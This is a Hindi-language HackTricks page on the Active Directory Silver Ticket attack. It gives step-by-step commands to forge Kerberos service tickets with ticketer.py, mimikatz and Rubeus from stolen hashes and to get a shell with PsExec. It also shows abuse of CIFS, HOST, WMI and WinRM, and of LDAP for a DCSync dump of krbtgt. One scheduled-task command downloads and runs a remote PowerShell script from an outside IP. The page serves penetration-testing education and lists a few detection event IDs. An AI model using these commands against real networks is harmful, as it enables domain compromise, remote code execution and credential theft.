hacktricks/windows-hardening/active-directory-methodology/silver-ticket.md

15 KiB

सिल्वर टिकट

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप हैकिंग करियर में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - हम भर्ती कर रहे हैं! (पोलिश भाषा में धाराप्रवाह लिखित और बोलचाल आवश्यक है).

{% embed url="https://www.stmcyber.com/careers" %}

सिल्वर टिकट

सिल्वर टिकट हमला एक वैध TGS बनाने पर आधारित है जब सेवा का NTLM हैश मालिकाना होता है (जैसे कि PC अकाउंट हैश). इस प्रकार, यह संभव है कि किसी भी उपयोगकर्ता के रूप में एक कस्टम TGS बनाकर उस सेवा तक पहुंच प्राप्त की जा सके.

इस मामले में, AD में एक उपयोगकर्ता खाते की तरह कंप्यूटर खाते का NTLM हैश मालिकाना होता है. इसलिए, यह संभव है कि एक टिकट बनाई जाए जिससे उस मशीन में प्रवेश किया जा सके SMB सेवा के माध्यम से एडमिनिस्ट्रेटर विशेषाधिकारों के साथ. कंप्यूटर खाते अपने पासवर्ड हर 30 दिनों में डिफ़ॉल्ट रूप से रीसेट करते हैं.

यह भी ध्यान में रखा जाना चाहिए कि यह संभव और पसंदीदा (opsec) है कि AES Kerberos कुंजियों (AES128 और AES256) का उपयोग करके टिकट बनाए जाएं. AES कुंजी कैसे उत्पन्न करें यह जानने के लिए पढ़ें: MS-KILE का अनुभाग 4.4 या Get-KerberosAESKey.ps1.

{% code title="Linux" %}

python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
Windows में, **Mimikatz** का उपयोग **ticket** बनाने के लिए किया जा सकता है। इसके बाद, **Rubeus** के साथ ticket को **inject** किया जाता है, और अंत में **PsExec** की मदद से एक दूरस्थ shell प्राप्त की जा सकती है।

{% code title="Windows" %}
#Create the ticket
mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"
#Inject in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt ticket.kirbi"
.\Rubeus.exe ptt /ticket:ticket.kirbi
#Obtain a shell
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

#Example using aes key
kerberos::golden /user:Administrator /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /target:labwws02.jurassic.park /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi

{% endcode %}

CIFS सेवा वह है जो आपको पीड़ित की फाइल सिस्टम तक पहुंचने की अनुमति देती है। आप यहां अन्य सेवाएं देख सकते हैं: https://adsecurity.org/?page_id=183 उदाहरण के लिए, आप HOST सेवा का उपयोग करके किसी कंप्यूटर में schtask बना सकते हैं। फिर आप यह जांच सकते हैं कि यह काम कर रहा है या नहीं, पीड़ित के कार्यों की सूची बनाकर: schtasks /S <hostname> या आप HOST और RPCSS सेवा का उपयोग करके किसी कंप्यूटर में WMI क्वेरीज़ को निष्पादित कर सकते हैं, इसे परीक्षण करें: Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>

उपाय

Silver ticket की घटनाओं की ID (golden ticket से अधिक गुप्त):

  • 4624: खाता लॉगऑन
  • 4634: खाता लॉगऑफ
  • 4672: व्यवस्थापक लॉगऑन

Silver Tickets के बारे में अधिक जानकारी ired.team पर

उपलब्ध सेवाएं

सेवा प्रकार सेवा Silver Tickets
WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

ओएस पर निर्भर करते हुए भी:

WSMAN

RPCSS

WinRM

HOST

HTTP

कुछ अवसरों पर आप सिर्फ पूछ सकते हैं: WINRM

निर्धारित कार्य HOST
Windows File Share, यह भी psexec CIFS
LDAP ऑपरेशन, DCSync सहित LDAP
Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets krbtgt

Rubeus का उपयोग करके आप इन सभी टिकटों के लिए पूछ सकते हैं पैरामीटर के साथ:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

सेवा टिकटों का दुरुपयोग

निम्नलिखित उदाहरणों में मान लें कि टिकट प्रशासक खाते का अनुकरण करके प्राप्त की गई है।

CIFS

इस टिकट के साथ आप SMB के माध्यम से C$ और ADMIN$ फोल्डर तक पहुंच सकते हैं (यदि वे उजागर हैं) और रिमोट फाइलसिस्टम के एक हिस्से में फाइलों की प्रतिलिपि बना सकते हैं बस ऐसा कुछ करके:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

HOST

इस अनुमति के साथ आप दूरस्थ कंप्यूटरों में निर्धारित कार्य उत्पन्न कर सकते हैं और मनमाने आदेश निष्पादित कर सकते हैं:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

इन टिकटों के साथ आप पीड़ित सिस्टम में WMI निष्पादित कर सकते हैं:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

निम्नलिखित पृष्ठ में wmiexec के बारे में अधिक जानकारी प्राप्त करें:

{% content-ref url="../ntlm/wmicexec.md" %} wmicexec.md {% endcontent-ref %}

HOST + WSMAN (WINRM)

winrm के माध्यम से एक कंप्यूटर तक पहुँच सकते हैं और यहाँ तक कि PowerShell भी प्राप्त कर सकते हैं:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

निम्नलिखित पृष्ठ पर जाएं ताकि winrm का उपयोग करके दूरस्थ होस्ट से जुड़ने के और तरीके सीखें:

{% content-ref url="../ntlm/winrm.md" %} winrm.md {% endcontent-ref %}

{% hint style="warning" %} ध्यान दें कि दूरस्थ कंप्यूटर पर पहुँचने के लिए winrm सक्रिय और सुन रहा होना चाहिए। {% endhint %}

LDAP

इस विशेषाधिकार के साथ आप DCSync का उपयोग करके DC डेटाबेस को डंप कर सकते हैं:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

DCSync के बारे में और जानें निम्नलिखित पृष्ठ पर:

{% content-ref url="dcsync.md" %} dcsync.md {% endcontent-ref %}

यदि आप हैकिंग करियर में रुचि रखते हैं और अहैकिबल को हैक करना चाहते हैं - हम भर्ती कर रहे हैं! (धाराप्रवाह पोलिश लिखित और बोली जाने वाली आवश्यकता).

{% embed url="https://www.stmcyber.com/careers" %}

htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें!

HackTricks का समर्थन करने के अन्य तरीके: